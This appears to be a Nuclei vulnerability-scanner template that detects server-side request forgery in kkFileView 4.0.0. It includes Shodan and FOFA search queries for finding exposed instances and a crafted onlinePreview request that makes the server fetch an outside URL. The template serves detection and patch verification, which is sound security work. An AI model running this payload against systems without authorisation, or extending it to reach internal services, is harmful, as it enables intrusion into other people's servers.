id: kkfileview-ssrf

info:
  name: kkFileView 4.0.0 - Server-Side Request Forgery
  author: Arm!tage
  severity: high
  description: |
    kkFileView 4.0.0 is susceptible to server-side request forgery
  reference:
    - https://github.com/kekingcn/kkFileView/issues/296
  classification:
    cwe-id: CWE-918
    cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: keking
    product: kkfileview
    shodan-query:
      - http.html:"kkFileView"
      - http.html:"kkfileview"
    fofa-query:
      - app="kkFileView"
      - app="kkfileview"
      - body="kkfileview"
  tags: ssrf,kkfileview,keking

http:
  - method: GET
    path:
      - "{{BaseURL}}/onlinePreview?url={{base64('http://oast.fun/robots.txt')}}"

    extractors:
      - type: regex
        name: data
        group: 1
        regex:
          - 'hidden id="textData" value="([A-Za-z0-9=]+)"\/>'
        internal: true
    matchers:
      - type: dsl
        dsl:
          - contains(base64_decode(data), "Disallow")
# digest: 4a0a0047304502203104a5653f3f50da4291322ff4224015f6cd23f6e97d789a69aa3d423911ee010221009db4f8c63e39ca3fbfbe87fe6211ea41d4b270b48dcffffdd06f490dec0118eb:922c64590222798bb761d5b6d8e72950